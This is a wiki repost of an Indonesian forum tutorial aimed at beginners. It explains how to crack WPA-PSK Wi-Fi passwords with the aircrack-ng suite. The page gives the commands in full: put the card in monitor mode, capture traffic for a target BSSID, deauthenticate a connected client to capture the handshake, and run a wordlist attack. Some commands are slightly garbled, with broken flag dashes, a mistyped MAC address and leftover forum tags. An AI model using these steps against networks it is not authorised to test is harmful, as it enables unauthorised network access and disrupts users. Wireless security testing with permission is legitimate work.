Backtrack: Tutorial cracking WPA PSK

From OnnoWiki
Revision as of 07:53, 3 June 2010 by Onnowpurbo (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Sumber: http://indobacktrack.or.id/2010/05/tutorial-cracking-wpa-psk/

Original post by : Neo at Komunitas Backtrack Indonesia Forum Index » Tutorial, Tips, dan Trick Backtrack follow this link for disscussion board http://indobacktrack.or.id/forum/viewtopic.php?t=695&highlight=tutorial+cracking+wpapsk

Sebenarnya Tutorial ini sudah sangat basi bagi kaum backtrackers, tapi ini khusus ditujukan kepada newbie yang ingin tahu tentang cara menghacking jaringan infrastructure dengan encryp WPA-PSK..agar tidak ada pertanyaan yang di ulang2 seperti yang terjadi di [b]area pertanyaan pemula[/b]

semoga tutorial ini dapat membantu…

Sebagai informasi Tutorial ini telah dipraktekan langsung oleh saya sendiri pada jaringan warnet yang merupakan punya teman saya dan atas sepengetahuan dia… sengaja tidak ada yang di kaburkan supaya lebih dimengerti

  • Siapkan CD Live Backtrack n tentunya dengan partnernya n of course sebatang rokok agar lebih santai..
  • masuk ke dekstop dengan perintah
# startx
  • buka konsole dan ketikkan perintah :
# ifconfig -a
  • Aktifkan interface wlan0
# ifconfig wlan0 up
  • Membuat virtual interface untuk mode monitoring. Biasanya akan dibuat interface virtual mon0.
# airmon-ng start wlan0 [/color]
  • Monitoring jaringan
# airodump-ng mon0

[color=blue]mon0 adalah interface virtual hasil dari airmon-ng tadi

hasil dari airodump-ng mon0

  • Monitor jaringan khusus untuk bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘test’
# airodump-ng -w test –channel 11 –bssid 00904c910001 mon0
  • Menggunakan aireplay-ng untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth [/list]
  • setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt

inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt[/color]

sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya…jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang qt miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal.

SEMOGA DAPAT MEMBANTU BAGI PARA NEWBIE… kalo ada kekurangan mohon dicerahkan..

Hidup Backtrackers Indonesia

Referensi

Pranala Menarik